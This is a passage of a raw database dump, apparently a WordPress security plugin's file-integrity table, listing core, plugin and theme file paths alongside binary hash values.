��RN�����c��','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/UploadedFileInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<@�SA����U�m�_','SsfW|��m�9u�YU	8occ��x�5��D��','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۘ���j玓݆E','��Kxf�������+eǖ٭�ʌ����m','',0,'?'),('��\\g&=��\0Mi{0','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��?kg���F�FT�','�kx����s���3��k���Q���9I]����V','',0,'?'),('�6��ri�|�(P�@�!','wp-content/plugins/wp-fastest-cache/inc/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[}��?��g}�','�{��b�N\nYE������E�=+Z �d��X','',0,'?'),('�46�.<;M\n','wp-content/plugins/wp-fastest-cache/images/download.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'��,�����(,','��$~g�<!�Y&����a�իdX��x�Ȋ','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݹ����T~K','1���%��~4O�7�WA�Ao/�3*C��f+C','',0,'?'),('�f!�*��O��+n','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-activate-plugins-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��swqT�J�|�q','��\Z�VΗ��f��!�[T�ɱ��֚�>','',0,'?'),('����͊pzn0&t�C','wp-includes/wp-includes/js/jquery/ui/dialog.js',0,'�屬�U��u���z̜','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('�\'�Uk�?�+[N�5�z','wp-content/plugins/wordpress-seo/src/conditionals/wincher-enabled-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���ɷ�T1� ��:','@9)�����-V9\nh��fy\\�)�⍫�I','',0,'?'),('�/_2��|\n�C��Z2�','wp-content/themes/hitmag/inc/kirki/controls/class-kirki-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��<ؗ�6��b�X�X','�Dc=?�d��A�IhX����F5���o�ʩ','',0,'?'),('�SQ�sY7aF�IMj�z','wp-includes/blocks/post-author/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&Q��@�F �','�K�-��~#���/��ѭ֤9k[^vcn�x','',0,'?'),('�W}\rDŬ�w��*��','wp-includes/blocks/query-pagination-next/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dl�����\rB�\'ק�','�i�R�P�ӡ,���ֲ�@�3-�V�@���h��','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��~�ĩ�B�<�X','��8��h�bS�z��m�sabjK\0���%�o','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('ǟ��H0�Q�Y�>','wp-includes/wp-includes/class-walker-nav-menu.php',0,'�S��|8���~Rx�4','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('Ǫh�k����j<T�','wp-content/plugins/wordfence/js/wfdashboard.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W\"�ui�Xk7�-�','z�悞�b��E�L�4vЋ�B�ӟ�(5�I','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��`D�h�m�ٻ��M','�8\\�Q�\\8��#�a���XP=��gR��','',0,'?'),('ǯ��\r�?��ғ�7��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�\0�$	�u��;����','�?ie\r\'�a���\\Yd��k/���9��G�9�Y`','',0,'?'),('Dz��d�	�Y$w��J�','wp-content/plugins/wp-fastest-cache/js/lang/de.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꈾ�yH(m&��S��K','�d��p>�<�^���x(;\'K�dO΅��J','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('�Ϋb�O�����wZ�M','wp-content/plugins/wp-fastest-cache/templates/cdn/exclude_sources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jx\'1>��[��}��','�ܔ_����3�4�ѨP`^�:`sO?��','',0,'?'),('�ڪ�&����e��pR��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php',0,'x} ��pc��K�O�','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('��myvH��̍���','wp-includes/blocks/table/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Զ��(���/��','*tol��\\/����\nQ~&%�݇�����','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�����)�5��Dr�\r','wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-activate-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*9�jBJ�\'O%\Z��I','b��^=G�(��-婐)��x�X�','',0,'?'),('����[^���yE��sB','wp-content/plugins/wordpress-seo/src/models/indexable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/B�hP\r:h��Z�','VS�}x��Č��*%5B�K�*��Z\n?�m3��%','',0,'?'),('�\r^��� �R9f$.','wp-content/plugins/wordfence/css/main.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1\r��8���#���;�','�l�j>H�I�	\"�&Hq2e�a�\\�1���2^','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽	�%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('��e�P\Zya\n��','wp-content/plugins/wordpress-seo/admin/views/tabs/network/restore-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����z7�H�V���L�','��:���b �y�R�2��pR�;���\\\\��iS','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�\'S����|�<�9�','wp-content/plugins/wp-fastest-cache/images/loader-statics.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��NU\0\r1~M�qr�','�0�$L&;v1?�=$P�Kv��`c����ִ�jF�','',0,'?'),('�6��w���r]��*\\#','wp-content/plugins/wordfence/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B7�&�]��NDd','�@H����M;ﺾ�5 i��\'��o�5V�','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hwB���e (���','���^K$���1\0�nƄ&�iM{�$�^�h�','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U}d��>��2�>\0N��','O��>$���hz5Mf4�+�I?rbǯ�dW@`�','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5>�\Z�!�̄�����','\"`\n��2Zgo�j1�p�hG)M�O�Ya�\rci@G','',0,'?'),('�A�G-n��B! ��b','wp-content/plugins/wordpress-seo/admin/watchers/class-slug-change-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ�a.V�Z�d���B','b-��L����Q�<��E��?�D�\rc�4��','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�_�Q�U��)L�d���','wp-content/plugins/wordfence/css/license/response-global.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��#�!+h�N�i@','V��[�\'���yyX?�yeV{F����eC�l�%�','',0,'?'),('�d�1�M�Toi�R܈�','wp-content/plugins/wp-cerber/assets/flags/ph.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�nJ_�#����F\0��2','�{�)ڸ����P �Ƒ�}f^~,)�C�','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H����k-x��f�C/','�q�~xY�\Zk����o�ϫ�(NS�B���','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2A�tz`�n%��YP�','�����\\�1��[��Z�>EK��Rk��W\\�v�','',0,'?'),('ȋ�uN��1�c�7','wp-content/plugins/redirection/api/api-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�[p���\nd�CC G','a�T\'E}��0�CNE��H��`^��$7','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�<n?�Ûg��o��','E}g����ÌUSG�}�qǟ]�����Vˮ!�','',0,'?'),('ȍٶ��tT�l�~�','wp-includes/js/dist/development/react-refresh-runtime.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:��6*\r��)�','O��GK�0(�\0X�/\nˏ��7�_���\r&0��F�','',0,'?'),('ȑ\\�#\"�*����*!2','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',0,'����O�����81','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('ț*I��SJ��/�=�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K)#y�^�����$�','P���`(F�����\nDz��7O߿S�\'��\\','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('����}���%}�vM','wp-content/themes/hitmag/inc/kirki/core/class-kirki-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(X+��a9o�/1>��24','�_�����\"��m���F�*l�\r�3Č0�','',0,'?'),('��� ��sǦI�V$�','wp-content/plugins/wordpress-seo/js/dist/externals/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l(�N;��&��.z','���zkGRǒ���edT�.��pA��]��n��','',0,'?'),('��Q�q�}ޅ��[\r��<','wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�Ξggl�yne�۝','ڮ�GZ�$v*�����G{��ͱR��#�_?�','',0,'?'),('���*�D�F�?>��','wp-content/plugins/wp-cerber/assets/flags/ml.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��j�h[k~��FF��','����pPz;�%���@�6�M<��PX�j%','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�1��9W�u�Ӏ4B�','wp-includes/blocks/query-no-results/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z~]�@��>�m�','�y&�]o�$u#�~*�\"�]6�i�t��w\\�NT','',0,'?'),('�3���\'M/�Ĵ3�u','wp-content/plugins/wp-smushit/_src/js/global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`xf�\Z�g�','g��E�,^�R�nA�\\�Jw,��3L�?��.�ܕ','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��+N��6z���','x��jN�n *�p�R\n����k�o�r.!#���','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','خ%�ֺ�Rd���@��','-q�!��i���7BhQ�pv���l++���x\0���','',0,'?'),('�Z�~\"�:#߉�\0Y��{','wp-content/plugins/wp-smushit/app/assets/js/smush-rd.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�Ь	о�~��','ЇO�s��堋$�y����~4l�u2�','',0,'?'),('�_�xx����,����M','wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php',0,'�[q�7d�v���z�','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('�y�8��c4�i��','wp-includes/wp-includes/js/jquery/ui/checkboxradio.js',0,'�\"VSdF\n��k���:','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/}��U�G+��','\'o�w�,X^�x���(���*����/�T?�a�','',0,'?'),('ɏ�u��&\\��Z','wp-includes/wp-includes/js/dist/server-side-render.js',0,'1�eQǔ;-P7�苛�d','1�eQǔ;-P7�苛�d','rP���^�ç\Zx~�;�����\"�x]43s','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8���\0z)�j����','��tՙ�ޫ�r9L�_s�!��^�叾�X�^W�','',0,'?'),('ɣ/e��;���v�','wp-includes/wp-includes/class-wp-application-passwords.php',0,'�;�Q����cW�M7A','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('ɧM:�E��(��6%=','wp-content/plugins/wordpress-seo/admin/class-database-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��Qp�֢��\n�&�','>�P�y:�������&\"0�TS���\'�Y','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('���=)�`K�\'��xXe','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',0,'�u��u��tu�+]�a','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('������h&�\'s','wp-includes/blocks/search/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�tp{�&<웑6�1��','\n�� #8���ޗF����ӳl��䇗7�;�','',0,'?'),('��E\'��g�����','wp-content/plugins/wp-cerber/assets/flags/eu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~W��,q����|���','���u���\"B�h�>VW��6>�=���','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�����l�V�^~���','wp-content/themes/hitmag/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rY�<n8�����p�','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('� ���tdrlPj','wp-includes/css/dist/widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�C+u��\"��	�:^�','���\'F��ËM61���M��\"	@p���\\M: ','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_���h�A?���D','��LZ�V(j��0�~�\Z3u�)��ztef\n���O','',0,'?'),('�@>A-\0yE�\"!�#','wp-content/plugins/wordpress-seo/src/initializers/disable-core-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�E鷒П ��v��','�~X:��$z�w�쐓�t�l���\'/2�3Oݕ','',0,'?'),('�L�t/�\Z�I��I�','wp-content/plugins/redirection/locale/json/redirection-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��d�-�Y����M��','*�c�	vl���ϧn���y��}\Z?\0I�,','',0,'?'),('�R���ш�޿�0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\'�H\0��','(���b�A���N+�S�B�܉Lx��;��(�','',0,'?'),('�g7,u,�<I���ͥ�','wp-includes/wp-includes/css/dist/block-directory/style-rtl.css',0,'��ˆ�gJ��^<','��ˆ�gJ��^<','���\ZybF���v��J�}�z��Lj��	(','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �\n�_��1nvU�','\"��Dy���T<��ٹ�9�k�|[�����','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���F7w-[�P�\n','נ�u�M�����@�`9�X��=�Ƽo�','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rߍ��}�)�Q9��','f�F�1@���9��?\\>�$o���gŨ��X','',0,'?'),('�{&�H�N�`b5IЌ�E','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/RefreshToken.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fUc�B���<\\5M7','%Z��eM�������>�g��*%��j˿�','',0,'?'),('ʁ	i���:g�y','wp-includes/blocks/search/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��嘻�S','��-N�k\"�,[�[�j�_t -�X�O����','',0,'?'),('ʊ�2�%�+a_��LF','wp-includes/blocks/columns/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\Z��dMGV�7q�','̙���D}m���aC�l�C��FkXIUjw/�','',0,'?'),('ʏ[~K�/7��x�N','wp-content/plugins/wp-fastest-cache/templates/nginx_gzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��}�I�р��LN07','��[�e[�W��z�CYU[��G�S[p�)u','',0,'?'),('ʑNWKL�a���Ij\n�3','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v4A�1�e���C','�kA�i&��`�~�{V��6�6�=�x_j��.','',0,'?'),('ʗ$�\"J�c��/�','wp-content/plugins/wp-cerber/assets/flags/mx.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Z��iFLv{��4^','0�{}aY��K�^�G�t��t�~+b��;�XZ','',0,'?'),('ʡsi#j����e��\0��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/he.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��mW�@+�q��-�ҟz','��S���\r�ގ�Q���P�Kle�u�q+�6Hp','',0,'?'),('ʭ�9p�7�+��l*�','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-taxonomy-settings-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���U3\0�F��','�_0e2�ѹo7;2˜���BY�D��Ė\'�','',0,'?'),('ʯ�e�6��kѭ��/','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N����ů)������','�\'�v�ᦸ� =���\'X�k��<6YS�t�','',0,'?'),('ʵs�B�s*x�n�	k','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsibles-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t#:��h/����2D','s�	������\r��dꥢ�6��+^�ѷ�ؾ','',0,'?'),('ʽ}�H6�xV��x�S','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/da.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m<׽y?��nA�','��H��N�ma�� �WƊ�x=\'�a�Fա&RΡ','',0,'?'),('�ۛ�Fl��`s�$��','wp-content/themes/hitmag/inc/kirki/core/class-kirki-setting-site-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���Lm�5~��','�҅�4�ɩ=JJS��v���K&��w���','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ųٞh�X�r~n�f','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('�ۨV��<��;�@P','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���k���5N^','�u/Y�a�4���\n�X��:-�HEV��b���','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('��	b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���7N:�\n���+��','��)ym�Er�F��J��2\\�͌\n��\Zg;F�I?','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��Jnw��8z2�swa','�u<�O�8Be\'O�b\0y�PJ�x7���I�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('�\0w��_E��d����q','wp-includes/wp-includes/js/wp-embed-template.min.js',0,'x)�tM�`WXx>�5�\\�','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('�\0�!Z�h��x�8�','wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+���c��aFsO\ZK8�','D�ԑ�A�	�J\n\'X)�9�\rvN�������mcp','',0,'?'),('����A��\\\n','wp-content/plugins/wp-cerber/assets/flags/om.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<=���`�/O��p	','ɃP8	FFDh=���vz�zo�t�3��4��?','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�(�fbܜ�}W��F�','wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',0,'�}*�yY��ը�F�','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('�2�)|KǕR���U�','wp-content/plugins/wp-cerber/assets/flags/au.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�cP~7Ա�\'l	�|:','���{�SJxw��@q.�!���/\ZB�Qx0+�','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�N�ֻ�{�x�-��','9�uo�P��֯2oY�VP��џ��','',0,'?'),('�B�n��7��\'���','wp-content/plugins/wp-fastest-cache/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fȇ���Mr���','<�=8fS823���&��Ao�\r�\"�2����','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�hC<\0�� C���T','�q�}��,P/L�an���p���\Zr+#��','',0,'?'),('�U��}�B��	Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���<\n�g����','s�o(�$>��F�F�7^J�x���/^��-��F','',0,'?'),('�c�ڮq��\"�.|0>','wp-content/plugins/wordfence/images/icons/check-response.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��F�������','82f�)�o>��5iq)��e=���G�}��','',0,'?'),('�q�8�]C���֔�','wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�Ϝ�{��/�y','��?a��d&�.�ɖ�����q�V$��Md','',0,'?'),('�s#y�h���b�E�','wp-content/plugins/wordpress-seo/src/exceptions/missing-method.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�u\\M,!���','�C4Х� �]{(\"��f��I8F´0�z[G@6�6','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������S�4,=�tP','���-.\\zo�֑�ʈg�mP�P�R�.�$�','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r,86,�կ��De�$�','o!�jh�oP���d���6$��޻;��D�\rN�','',0,'?'),('ˆ]g�1{[	